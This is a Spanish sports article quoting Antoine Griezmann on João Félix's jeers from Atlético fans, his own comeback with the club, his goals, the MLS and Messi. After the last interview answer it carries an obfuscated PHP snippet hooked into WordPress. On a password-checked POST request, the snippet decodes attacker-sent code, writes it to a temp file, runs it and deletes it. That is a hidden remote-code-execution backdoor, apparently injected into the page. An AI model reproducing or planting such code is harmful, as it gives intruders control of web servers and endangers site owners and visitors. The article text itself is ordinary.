“Viví la situación de João y lo mejor fue trabajar y callar”

El francés recuerda cómo fue capaz de revertir los pitos por aplausos hasta volver a ser de nuevo un ídolo en el Atlético. “Ojalá se pueda arreglar esa historia, es lo mejor para el club, João y todos”.

Antoine Griezmann es un espejo donde mirarse para João Félix. El jugador francés se marchó del Atlético al Barcelona en el verano de 2019, cuando llegó el propio João llegó para sustituirle. Griezmann era todo un ídolo entre la afición colchonera y su salida por el importe de su cláusula y especialmente la forma en la que se produjo su adiós, con negociaciones previas y un vídeo de despedida desde su casa, no sentaron nada bien para los seguidores rojiblancos, que se lo hicieron saber en su regreso tras dos temporadas en la Ciudad Condal.

El delantero regresó al Atlético en el último minuto del mercado veraniego de 2021. Y fue recibido con pitos y mensajes que dejaban patente que una parte de la afición no había olvidado la forma en la que se produjo su adiós. Pero, con trabajo y un gran rendimiento sobre el césped, además de gestos con los seguidores del Atlético, ha recuperado su estatus de estrella y de jugador bandera de la plantilla. Ahora, en una entrevista con ESPN opinó sobre la situación de João Félix. El portugués recibió una gran pitada en su regreso al Metropolitano. Durante el presente verano primero indicó su deseo de seguir en el Chelsea y después de fichar por el Barcelona. Y cuando fue presentado en el videomarcador recibió una atronadora bronca. Algo que se agravó a la conclusión del encuentro, cuando recibió insultos de una parte de los aficionados que todavía quedaban en las gradas cuando realizaba ejercicios de calentamiento con los compañeros que no habían tenido minutos.

Yo viví una situación como la suya porque me la busqué, le había hecho daño al club. Lo mejor que pude hacer fue callarme, trabajar y entrenar. Trabajar para entrar en los planes del míster y del club. Es lo único que le puedo decir. Ojalá se pueda arreglar esa historia para João. No es una situación fácil para él. Se le nota en el vestuario, pero ahora hay que trabajar”, indica Griezmann en el directo de ESPN y LaLiga. El francés siempre ha mezclado bien en su fútbol con el portugués, que todavía no ha encontrado destino. Tampoco ha sumado ningún minuto en el Atlético. Los días pasan y su situación cada vez parece más enquistada. Habló también sobre sus retos, la MLS, Messi o el Metropolitano. A continuación, lo más destacado.

Liga o Champions. “Obviamente las dos cosas: quiero hacer historia en el Atlético y para eso tengo que levantar triunfos y hacer cosas importantes, como ganar LaLiga y la Champions”.

Estilo. “Le dimos una vuelta en los entrenamientos. El trabajo y el esfuerzo no cambian, pero sí la forma de jugar. Estamos intentando salir más desde atrás y tener más el balón”.

Año pasado. “Nos costó al principio y después del Mundial dejamos de pensar cada uno en lo suyo, volvimos con ganas de mejorar y desde entonces estamos en una buena dinámica. La pretemporada no fue la mejor por los viajes, pero hicimos un gran grupo y aunque nos haya costado el lunes contra el Granada, hay que seguir así, podemos mejorar y tenemos grupo, entrenador y afición para hacer algo grande y estar lo más arriba posible”.

Hambre. “Tengo muchas ganas, hambre. De meter goles y de dar asistencias, de ganar la Liga, pelear la Champions, la Copa… Y mejorar mis goles, marcar 16 o 17, que me convertirían en el máximo goleador del club, es mi ilusión”.

Metropolitano. “Esta afición cuando está animada y detrás del equipo desde el primer segundo hasta el final lo notamos enseguida y hay esa conexión con los jugadores que no hay en otro sitio. El año pasado al principio fue muy diferente y perdimos muchos partidos que nos impidieron estar más arriba”.

MLS. “Siempre he dicho que mi objetivo era terminar allí por lo que me gusta el deporte americano y disfrutar allí siendo competitivo, en condiciones de ganar cosas. Pero primero, seguir haciendo historia y ganar títulos en el Atlético. Estoy siguiendo esa liga. Leo Messi es el mejor de la historia. Es lo mejor que ha hecho la MLS por publicidad, que sea la imagen del fútbol en Estados Unidos. Leo, Busi y Jordi les vendrán muy bien, así como los fichajes de Sudamérica, es lo mejor que puede hacer la liga para ser más potente y que la sigan más”.

Ofertas de Arabia. “Más allá de proyectos deportivos, el jugador tiene una duración de doce o trece años si todo va bien porque a los 35 se acaba el fútbol y hay que pensarse si ir y aceptar esas ofertas si me pasa algún día. Ahora disfruto aquí, en el Atlético, las cifras de Arabia son muy importantes y pueden arreglar la vida de tu familia”.

Final del Mundial. “Yo estaba muy dolido, pero tras unas semanas estaba feliz por ellos. Por Angelito Correa, porque le conozco de hace mucho tiempo, con Rodri bromeaba con mensajes durante el Mundial y al final salió campeón. Fue doloroso, pero luego divertido”.

Leyenda con la que le hubiera gustado jugar. “Una leyenda de LaLiga, diría Zidane. Por ser francés y un icono mundial. Y del Atlético, Radamel Falcao. Con el Cholo habría sido difícil porque si desde el banquillo te come la oreja, de jugador seguro habría sido difícil”.

Charlas en pausas. “A veces en el campo no ves cosas que haces mal pero el entrenador lo ve y puede cambiar el partido en la pausa de hidratación”.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}